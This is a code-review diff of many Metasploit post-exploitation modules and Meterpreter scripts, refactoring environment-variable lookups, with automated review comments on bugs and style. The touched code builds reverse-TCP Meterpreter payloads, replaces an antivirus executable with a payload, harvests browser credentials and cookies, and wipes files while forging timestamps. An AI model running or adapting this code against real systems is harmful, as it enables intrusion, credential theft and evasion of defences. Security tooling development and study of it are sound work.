has_sqlite3 = true
|
||||
|
|
|
@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
|
|||
return results
|
||||
end
|
||||
|
||||
windir = session.fs.file.expand_path("%windir%")
|
||||
windir = session.sys.config.getenv('windir')
|
||||
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
|
||||
|
||||
data = nil
|
||||
|
@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
|
|||
elsif exist?(val_location + "\\my.cnf")
|
||||
data = read_file(val_location + "\\my.cnf")
|
||||
else
|
||||
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
|
||||
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
|
||||
getfile.each do |file|
|
||||
if exist?("#{file['path']}\\#{file['name']}")
|
||||
|
|
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
|
||||
def download_files(location, file_type)
|
||||
sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
|
||||
sysnfo = client.sys.config.sysinfo['OS']
|
||||
profile_path_old = sysdriv + "\\Documents and Settings\\"
|
||||
profile_path_new = sysdriv + "\\Users\\"
|
||||
|
|
|
@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
|
|||
xp_c = "\\Cookies\\index.dat"
|
||||
h_paths = []
|
||||
c_paths = []
|
||||
base = session.fs.file.expand_path("%USERPROFILE%")
|
||||
base = session.sys.config.getenv('USERPROFILE')
|
||||
if host['OS'] =~ /(Windows 7|2008|Vista)/
|
||||
h_paths << base + vist_h
|
||||
h_paths << base + vist_hlow
|
||||
|
|
|
@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post
|
|||
users = []
|
||||
user = session.sys.config.getuid
|
||||
path4users = ""
|
||||
sysdrv = session.fs.file.expand_path("%SystemDrive%")
|
||||
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
|
||||
sysdrv = env_vars['SystemDrive']
|
||||
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
path4users = sysdrv + "\\Users\\"
|
||||
|
@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = session.fs.file.expand_path("%USERNAME%")
|
||||
uservar = env_vars['USERNAME']
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + profilepath
|
||||
users << userinfo
|
||||
|
@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
if powershell_version =~ /2./
|
||||
print_status("Powershell Modules:")
|
||||
powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
|
||||
powershell_module_path = session.sys.config.getenv('PSModulePath')
|
||||
session.fs.dir.foreach(powershell_module_path) do |m|
|
||||
next if m =~ /^(\.|\.\.)$/
|
||||
print_status("\t#{m}")
|
||||
|
|
|
@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post
|
|||
print_prefetch_key_value
|
||||
print_timezone_key_values(key_value)
|
||||
print_good("Current UTC Time: %s" % Time.now.utc)
|
||||
sys_root = expand_path("%SYSTEMROOT%")
|
||||
sys_root = session.sys.config.getenv('SYSTEMROOT')
|
||||
full_path = sys_root + "\\Prefetch\\"
|
||||
file_type = "*.pf"
|
||||
print_status("Gathering information from remote system. This will take awhile..")
|
||||
|
|
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
|
|||
# Initialize all 7 possible paths for the answer file
|
||||
#
|
||||
def init_paths
|
||||
drive = session.fs.file.expand_path("%SystemDrive%")
|
||||
drive = session.sys.config.getenv('SystemDrive')
|
||||
|
||||
files =
|
||||
[
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post
|
|||
register_advanced_options(
|
||||
[
|
||||
OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),
|
||||
OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
|
||||
OptInt.new( 'EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
|
||||
OptBool.new( 'DELETE', [true, 'Delete file after execution', false ]),
|
||||
], self.class)
|
||||
|
||||
|
@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post
|
|||
url = datastore["URL"]
|
||||
filename = datastore["FILENAME"] || url.split('/').last
|
||||
|
||||
download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
|
||||
if download_path.nil? or download_path.empty?
|
||||
path = session.fs.file.expand_path("%TEMP%")
|
||||
path = datastore['DOWNLOAD_PATH']
|
||||
if path.blank?
|
||||
path = session.sys.config.getenv('TEMP')
|
||||
else
|
||||
path = download_path
|
||||
path = session.fs.file.expand_path(path)
|
||||
end
|
||||
|
||||
outpath = path + '\\' + filename
|
||||
exec = datastore['EXECUTE']
|
||||
exec_string = datastore['EXEC_STRING'] || ''
|
||||
exec_string = datastore['EXEC_STRING']
|
||||
output = datastore['OUTPUT']
|
||||
remove = datastore['DELETE']
|
||||
|
||||
|
@ -108,11 +108,7 @@ class Metasploit3 < Msf::Post
|
|||
# Execute file upon request
|
||||
if exec
|
||||
begin
|
||||
cmd = "#{outpath} #{exec_string}"
|
||||
|
||||
# If we don't have the following gsub, we get this error in Windows:
|
||||
# "Operation failed: The system cannot find the file specified"
|
||||
cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ')
|
||||
cmd = "\"#{outpath}\" #{exec_string}"
|
||||
|
||||
print_status("Executing file: #{cmd}")
|
||||
res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])
|
||||
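Review bot: `OptInt.new( 'EXEC_TIMEOUT', ...)` and `OptBool.new( 'DELETE', ...)` put a space after the opening paren while `OptString.new('EXEC_STRING', ...)` on the line above does not; the style guide wants none, so `OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),` and `OptBool.new('DELETE', [true, 'Delete file after execution', false ]),`. In the -76,16 +76,16 hunk, `path = session.sys.config.getenv('TEMP')` can presumably be nil when `TEMP` is unset, and `outpath = path + '\\' + filename` would then raise TypeError; a `print_error` / `return` when `path.blank?` right after the `if` gives a clearer failure. Dropping `|| ''` from `exec_string` is harmless because nil interpolates as "" in `cmd = "\"#{outpath}\" #{exec_string}"`, though the command now ends in a space when EXEC_STRING is unset.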
|
|
|
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def create_pac(local_pac)
|
||||
pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
|
||||
pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
|
||||
conf_pac = ""
|
||||
|
||||
if ::File.exists?(local_pac)
|
||||
|
|
|
@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
|
|||
# Creates a temp notepad.exe to inject payload in to given the payload
|
||||
# Returns process PID
|
||||
def create_temp_proc(pay)
|
||||
windir = client.fs.file.expand_path("%windir%")
|
||||
windir = client.sys.config.getenv('windir')
|
||||
# Select path of executable to run depending the architecture
|
||||
if pay.arch.join == "x86" and client.platform =~ /x86/
|
||||
cmd = "#{windir}\\System32\\notepad.exe"
|
||||
|
|
|
@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post
|
|||
else
|
||||
print_status("Rpcap service found: #{serv['Name']}")
|
||||
reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
|
||||
prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
|
||||
# TODO: check if this works on x64
|
||||
prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
|
||||
if reg != 2
|
||||
print_status("Setting rpcapd as 'auto' service")
|
||||
service_change_startup("rpcapd","auto")
|
||||
|
|
|
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
# set profile paths
|
||||
sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
|
||||
os = @host_info['OS']
|
||||
profiles_path = sysdrive + "\\Documents and Settings\\"
|
||||
profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/
|
||||
|
|
|
@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
#Function to calculate the size of the cluster
|
||||
def size_cluster()
|
||||
drive = expand_path("%SystemDrive%")
|
||||
r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
|
||||
drive = session.sys.config.getenv('SystemDrive')
|
||||
r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
|
||||
cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
|
||||
print_status("Cluster Size: #{cluster}")
|
||||
|
||||
|
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
#Function to calculate the real file size on disk (file size + slack space)
|
||||
def size_on_disk(file)
|
||||
size_file = client.fs.file.stat(file).size;
|
||||
size_file = session.fs.file.stat(file).size;
|
||||
print_status("Size of the file: #{size_file}")
|
||||
|
||||
if (size_file<800)
|
||||
|
@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
|
|||
rsec= Rex::Text.rand_text_numeric(7,bad='012')
|
||||
date = Time.now - rsec.to_i
|
||||
print_status("Changing MACE attributes")
|
||||
client.priv.fs.set_file_mace(file, date,date,date,date)
|
||||
session.priv.fs.set_file_mace(file, date,date,date,date)
|
||||
end
|
||||
|
||||
#Function to overwrite the file
|
||||
def file_overwrite(file,type,n)
|
||||
#FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
|
||||
r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
|
||||
r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
|
||||
handle=r['return']
|
||||
real_size=size_on_disk(file)
|
||||
|
||||
|
@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
|
||||
client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
|
||||
session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
|
||||
|
||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
|
||||
w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
|
||||
w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
|
||||
|
||||
if w['return']==false
|
||||
print_error("The was an error writing to disk, check permissions")
|
||||
|
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
|
|||
print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
|
||||
end
|
||||
|
||||
client.railgun.kernel32.CloseHandle(handle)
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
change_mace(file)
|
||||
|
||||
#Generate a long random file name before delete it
|
||||
|
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
|
|||
print_status("Changing file name")
|
||||
|
||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
|
||||
client.railgun.kernel32.MoveFileA(file,newname)
|
||||
session.railgun.kernel32.MoveFileA(file,newname)
|
||||
|
||||
file_rm(newname)
|
||||
print_good("File erased!")
|
||||
|
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
|
|||
#Check if the file is encrypted or compressed
|
||||
def comp_encr(file)
|
||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
|
||||
handle=client.railgun.kernel32.GetFileAttributesA(file)
|
||||
handle=session.railgun.kernel32.GetFileAttributesA(file)
|
||||
type= handle['return']
|
||||
|
||||
#FILE_ATTRIBUTE_COMPRESSED=0x800
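Review bot: In the `size_cluster` hunk, `drive = session.sys.config.getenv('SystemDrive')` yields a bare `C:`-style value with no trailing separator, while the documented contract of `GetDiskFreeSpaceA`'s `lpRootPathName` asks for a root directory ending in a backslash; the next line then multiplies two out-fields without checking whether the call succeeded. Passing `"#{drive}\\"` and checking `r['return']` (the same status field the `WriteFile` hunk already tests) would avoid computing a cluster size from a failed call — hedged, since the exact failure representation of the railgun wrapper is not visible here. The `size_on_disk` hunk also leaves a stray `;` at the end of `size_file = session.fs.file.stat(file).size;`, which is not idiomatic Ruby. `size_cluster` continues past the hunk.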
|
||||
|
|
|
@ -61,7 +61,7 @@ def enum_users(os)
|
|||
user = @client.sys.config.getuid
|
||||
userpath = nil
|
||||
useroffcpath = nil
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
userpath = sysdrv + "\\Users\\"
|
||||
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
|
||||
|
@ -83,7 +83,7 @@ def enum_users(os)
|
|||
users << userinfo
|
||||
end
|
||||
else
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userpath'] = userpath + uservar + lnkpath
|
||||
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
|
||||
|
|
|
@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
|
|||
#
|
||||
# Upload to the filesystem
|
||||
#
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = client.sys.config.getenv('TEMP')
|
||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
tempexe.gsub!("\\\\", "\\")
|
||||
|
||||
|
|
|
@ -195,7 +195,7 @@ host = session.session_host
|
|||
@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
|
||||
::FileUtils.mkdir_p(@log_dir)
|
||||
|
||||
sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
|
||||
os = @host_info['OS']
|
||||
if os =~ /(Windows 7|2008|Vista)/
|
||||
@profiles_path = sysdrive + "\\Users\\"
|
||||
|
@ -218,7 +218,7 @@ if is_system?
|
|||
print_status "users found: #{usernames.join(", ")}"
|
||||
else
|
||||
print_status "running as user '#{uid}'..."
|
||||
usernames << client.fs.file.expand_path("%USERNAME%")
|
||||
usernames << client.sys.config.getenv('USERNAME')
|
||||
prepare_railgun
|
||||
end
|
||||
|
||||
|
|
|
@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
|
|||
if frfxchk
|
||||
user = @client.sys.config.getuid
|
||||
if not is_system?
|
||||
usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
|
||||
db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
|
||||
envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
|
||||
usrname = envs['USERNAME']
|
||||
db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
|
||||
if kill_frfx
|
||||
kill_firefox
|
||||
end
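Review bot: `usrname = envs['USERNAME']` drops the `Rex::FileUtils.clean_path` wrapper that the removed line applied, so a USERNAME value read from the target now flows unsanitized into whatever path `usrname` is later used to build (the original sanitization suggests a local filesystem path; that use is outside the hunk). Values read from a compromised host's environment should be treated as untrusted once they become local path components, so keep the sanitizer: `usrname = Rex::FileUtils.clean_path(envs['USERNAME'])`. `db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"` also raises NoMethodError if APPDATA is missing from the returned hash; a `print_error` and early return when either key is nil would fail more legibly.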
|
||||
|
|
|
@ -22,7 +22,7 @@ def enum_users
|
|||
users = []
|
||||
user = @client.sys.config.getuid
|
||||
path4users = ""
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
path4users = sysdrv + "\\Users\\"
|
||||
|
@ -43,7 +43,7 @@ def enum_users
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + profilepath
|
||||
users << userinfo
|
||||
|
@ -83,7 +83,7 @@ def enum_powershell
|
|||
end
|
||||
if powershell_version =~ /2./
|
||||
print_status("Powershell Modules:")
|
||||
powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
|
||||
powershell_module_path = @client.sys.config.getenv('PSModulePath')
|
||||
@client.fs.dir.foreach(powershell_module_path) do |m|
|
||||
next if m =~ /^(\.|\.\.)$/
|
||||
print_status("\t#{m}")
|
||||
|
|
|
@ -223,7 +223,7 @@ def enum_users
|
|||
users = []
|
||||
user = @client.sys.config.getuid
|
||||
path4users = ""
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
|
||||
if os =~ /7|Vista|2008/
|
||||
path4users = sysdrv + "\\users\\"
|
||||
|
@ -244,7 +244,7 @@ def enum_users
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + profilepath
|
||||
users << userinfo
|
||||
|
|
|
@ -18,13 +18,12 @@ def list_env_vars(var_names)
|
|||
"Name",
|
||||
"Value"
|
||||
])
|
||||
var_names.flatten.each do |v|
|
||||
tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
|
||||
@client.sys.config.getenvs(*var_names.flatten).each do |k, v|
|
||||
tbl << [k, v]
|
||||
end
|
||||
print("\n" + tbl.to_s + "\n")
|
||||
end
|
||||
|
||||
|
||||
opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-h"
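Review bot: `@client.sys.config.getenvs(*var_names.flatten).each do |k, v|` prints only the rows present in the returned hash, whereas the removed loop emitted exactly one row per requested name; if `getenvs` omits variables that are not set on the target (likely, to be confirmed against the stdapi implementation), a missing variable now disappears from the table instead of being visibly reported. Iterating the requested names and looking each one up preserves the table shape: `envs = @client.sys.config.getenvs(*var_names.flatten)` followed by `var_names.flatten.each { |v| tbl << [v, envs[v]] }`. `list_env_vars` starts outside the hunk.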
|
||||
|
|
|
@ -114,7 +114,7 @@ def enum_users(os)
|
|||
users = []
|
||||
|
||||
path4users = ""
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
|
||||
if os =~ /7|Vista|2008/
|
||||
path4users = sysdrv + "\\users\\"
|
||||
|
@ -135,7 +135,7 @@ def enum_users(os)
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + path2purple
|
||||
users << userinfo
|
||||
|
|
|
@ -145,7 +145,7 @@ def enum_users(os)
|
|||
users = []
|
||||
|
||||
path4users = ""
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
path4users = sysdrv + "\\users\\"
|
||||
|
@ -166,7 +166,7 @@ def enum_users(os)
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + path2purple
|
||||
users << userinfo
|
||||
|
|
|
@ -301,7 +301,7 @@ def checkdep(session)
|
|||
tmpout = ""
|
||||
depmode = ""
|
||||
# Expand environment %TEMP% variable
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
tmp = session.sys.config.getenv('TEMP')
|
||||
# Create random name for the wmic output
|
||||
wmicfile = sprintf("%.5d",rand(100000))
|
||||
wmicout = "#{tmp}\\#{wmicfile}"
|
||||
|
|
|
@ -30,7 +30,7 @@ end
|
|||
|
||||
record = ""
|
||||
#Set path to the hosts file
|
||||
hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
|
||||
hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
|
||||
#Function check if UAC is enabled
|
||||
def checkuac(session)
|
||||
winver = session.sys.config.sysinfo
|
||||
|
|
|
@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
|
|||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
|
||||
# Change to our working directory.
|
||||
workingdir = client.fs.file.expand_path("%ProgramFiles%")
|
||||
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
|
||||
workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
|
||||
client.fs.dir.chdir(workindir)
|
||||
|
||||
# Create a backup of the original exe.
|
||||
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
|
||||
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
|
||||
|
||||
# Place our newly created exe with the orginal binary name.
|
||||
tempdir = client.fs.file.expand_path("%ProgramFiles%")
|
||||
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
|
||||
tempexe = workingdir + "PAVSRV51.EXE"
|
||||
|
||||
print_status("Sending EXE payload '#{tempexe}'.")
|
||||
fd = client.fs.file.new(tempexe, "wb")
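Review bot: `client.fs.dir.chdir(workindir)` references an undefined local — the variable assigned on the line above is `workingdir` — so this branch raises NameError before the backup step runs. Fix the spelling: `client.fs.dir.chdir(workingdir)`. The new `workingdir` expression also assumes `getenv('ProgramFiles')` returns a non-nil string; the old `expand_path` form had the same exposure, but a `print_error` and return when the lookup is nil would fail more legibly than a NoMethodError on `+`. The surrounding `elsif` branch continues past the hunk.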
|
||||
|
|
|
@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
|
|||
if target_dir
|
||||
tempdir = target_dir
|
||||
else
|
||||
tempdir = @client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = @client.sys.config.getenv('TEMP')
|
||||
end
|
||||
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
||||
fd = @client.fs.file.new(tempvbs, "wb")
|
||||
|
|
|
@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
|
|||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
|
||||
# Place our newly created exe in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = client.sys.config.getenv('TEMP')
|
||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
print_status("Sending EXE payload '#{tempexe}'.")
|
||||
fd = client.fs.file.new(tempexe, "wb")
|
||||
|
|
|
@ -19,7 +19,7 @@ require 'digest/sha1'
|
|||
"-l" => [ false, "Download Prefetch Folder Analysis Log"]
|
||||
)
|
||||
|
||||
@tempdir = @session.fs.file.expand_path("%TEMP%")
|
||||
@tempdir = @session.sys.config.getenv('TEMP')
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def read_program_list
|
||||
|
|
|
@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
|
|||
runfail = 0
|
||||
runningas = session.sys.config.getuid
|
||||
begin
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
tmp = session.sys.config.getenv('TEMP')
|
||||
# Temporary file on windows host to store results
|
||||
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
|
||||
|
||||
|
|
|
@ -179,7 +179,7 @@ end
|
|||
#---------------------------------------------------------------------------------------------------------
|
||||
|
||||
def upload(session,file)
|
||||
location = session.fs.file.expand_path("%TEMP%")
|
||||
location = session.sys.config.getenv('TEMP')
|
||||
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
|
||||
print_status("Uploading #{file}....")
|
||||
session.fs.file.upload_file("#{fileontrgt}","#{file}")
|
||||
|
|
|
@ -99,6 +99,10 @@ upload_fn = nil
|
|||
end
|
||||
}
|
||||
|
||||
envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
|
||||
sysdir = envs['SystemRoot']
|
||||
tmpdir = envs['TEMP']
|
||||
|
||||
# Must have at least one of -c or -u
|
||||
if not cmd and not upload_fn
|
||||
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
|
||||
|
@ -110,9 +114,8 @@ if not cmd and not upload_fn
|
|||
raw = pay.generate
|
||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
#and placing it on the target in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
|
||||
cmd = tempdir + "\\" + tempexename + ".exe"
|
||||
cmd = tmpdir + "\\" + tempexename + ".exe"
|
||||
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
|
||||
fd = client.fs.file.new(cmd, "wb")
|
||||
fd.write(exe)
|
||||
|
@ -139,8 +142,6 @@ end
|
|||
#
|
||||
# Upload the payload command if needed
|
||||
#
|
||||
sysdir = session.fs.file.expand_path("%SystemRoot%")
|
||||
tmpdir = session.fs.file.expand_path("%TEMP%")
|
||||
if upload_fn
|
||||
begin
|
||||
location = tmpdir.dup
|
||||
|
|
|
@ -73,7 +73,7 @@ logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" +
|
|||
unsupported if client.platform !~ /win32|win64/i
|
||||
begin
|
||||
|
||||
tmp = client.fs.file.expand_path("%TEMP%")
|
||||
tmp = client.sys.config.getenv('TEMP')
|
||||
|
||||
print_status("Gathering basic system information...")
|
||||
|
||||
|
|
|
@ -51,6 +51,10 @@ opts.parse(args) do |opt, idx, val|
|
|||
end
|
||||
end
|
||||
|
||||
envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT')
|
||||
tempdir = envs['TEMP']
|
||||
sysdir = envs['SYSTEMROOT']
|
||||
|
||||
# Get the exe payload.
|
||||
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
|
||||
pay.datastore['LHOST'] = rhost
|
||||
|
@ -58,9 +62,8 @@ pay.datastore['LPORT'] = rport
|
|||
raw = pay.generate
|
||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
#and placing it on the target in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
|
||||
tempexe = tempdir + "\\" + tempexename + ".exe"
|
||||
tempexe = "#{tempdir}\\#{tempexename}.exe"
|
||||
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
|
||||
fd = client.fs.file.new(tempexe, "wb")
|
||||
fd.write(exe)
|
||||
|
@ -129,7 +132,7 @@ service_list.each do |serv|
|
|||
moved = false
|
||||
configed = false
|
||||
#default path, but there should be an ImagePath registry key
|
||||
source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
|
||||
source = "#{sysdir}\\system32\\#{serv}.exe")
|
||||
#get path to exe; parse out quotes and arguments
|
||||
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
|
||||
sourcemaybe = client.fs.file.expand_path(sourceorig)
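Review bot: `source = "#{sysdir}\\system32\\#{serv}.exe")` carries a trailing `)` left over from the removed `expand_path(...)` call, which is a syntax error that prevents the whole script from loading. Drop it: `source = "#{sysdir}\\system32\\#{serv}.exe"`. `sysdir` here is `envs['SYSTEMROOT']` from the first hunk, so if that key is absent from the `getenvs` result the interpolation silently produces a relative `\system32\...` path; guarding both values right after the `getenvs` call would surface that case. The enclosing `service_list.each` block continues outside the hunk.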
|
||||
|
|
|
@ -87,7 +87,7 @@ client.sys.process.get_processes().each do |m|
|
|||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
|
||||
# Place our newly created exe in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = client.sys.config.getenv('TEMP')
|
||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
print_status("Sending EXE payload '#{tempexe}'.")
|
||||
fd = client.fs.file.new(tempexe, "wb")
|
||||
|
|
|
@ -23,7 +23,7 @@ def upload(session,file,trgloc = "")
|
|||
raise "File to Upload does not exists!"
|
||||
else
|
||||
if trgloc == ""
|
||||
location = session.fs.file.expand_path("%TEMP%")
|
||||
location = session.sys.config.getenv('TEMP')
|
||||
else
|
||||
location = trgloc
|
||||
end
|
||||
|
|
|
